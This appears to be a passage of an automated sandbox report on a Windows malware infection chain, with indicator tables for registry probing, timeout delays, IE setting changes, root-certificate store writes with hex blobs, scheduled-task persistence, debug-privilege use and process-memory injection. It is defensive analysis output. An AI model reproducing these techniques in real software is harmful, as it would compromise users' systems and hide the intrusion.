Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\ProgramData\omlnpw\uxek.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2348 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2348 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2348 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2348 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2680 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 2680 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 2680 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 2680 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 2680 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2680 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2680 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2680 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1452 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1452 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1452 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1452 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1452 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1452 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1452 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1452 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1452 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1452 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1452 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Windows\SysWOW64\WerFault.exe
PID 1452 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Windows\SysWOW64\WerFault.exe
PID 1452 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Windows\SysWOW64\WerFault.exe
PID 1452 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Windows\SysWOW64\WerFault.exe
PID 2680 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 2680 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 2680 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 2680 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 2680 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe
PID 2680 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe
PID 2680 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe
PID 2680 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe
PID 1556 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe C:\Windows\SysWOW64\cmd.exe
PID 1556 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe C:\Windows\SysWOW64\cmd.exe
PID 1556 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe C:\Windows\SysWOW64\cmd.exe
PID 1556 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe C:\Windows\SysWOW64\cmd.exe
PID 1556 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe C:\Windows\SysWOW64\mshta.exe
